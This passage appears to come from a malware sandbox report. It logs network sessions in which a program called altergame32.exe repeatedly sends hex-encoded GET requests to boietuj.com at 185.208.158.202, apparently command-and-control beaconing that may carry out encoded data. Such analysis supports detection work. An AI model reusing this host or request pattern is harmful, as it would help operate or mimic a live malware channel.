                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:27.814490080 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:27.925499916 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:28.175709963 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.449927185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:28.303901911 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:29.002851963 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.449933185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:29.211000919 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:29.864598036 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.449939185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:30.277796984 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:30.897241116 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:30 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:31.035603046 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:31.290525913 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:31 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.449945185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:31.415579081 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:32.129146099 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:32.238684893 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:32.485069990 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.449956185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:32.604738951 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:33.320471048 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                14192.168.2.449962185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:33.446572065 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:34.155354977 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:34 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                15192.168.2.449968185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:34.435309887 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:35.150048018 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                16192.168.2.449974185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:35.335510969 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:36.033191919 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:35 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.449980185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:36.276232958 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:36.988056898 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:36 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:37.106259108 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:37.359772921 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:37.472235918 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:37.716728926 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:37 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.449991185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:37.837161064 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:38.564037085 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20
                                                                Nov 20, 2024 05:03:38.675477982 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:38.925234079 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.449999185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:39.288073063 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:39.993458986 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.450004185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:40.132663012 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:40.836936951 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:40 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.450011185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:40.962019920 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:41.685043097 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.450017185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:41.807394028 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:42.515575886 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:42 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.450023185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:42.636518955 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:43.344048023 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:43 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.450028185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:43.465081930 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:44.181684017 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.450029185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:44.306833029 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:45.014478922 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:44 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.450030185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:45.134144068 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:45.841032982 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:45 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.450031185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
                                                                Nov 20, 2024 05:03:45.962088108 CET322OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1
                                                                Host: boietuj.com
                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                Nov 20, 2024 05:03:46.665491104 CET220INHTTP/1.1 200 OK
                                                                Server: nginx/1.20.1
                                                                Date: Wed, 20 Nov 2024 04:03:46 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                X-Powered-By: PHP/7.4.33
                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: e67b680813008c20


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.450032185.208.158.202802488C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe
                                                                TimestampBytes transferredDirectionData
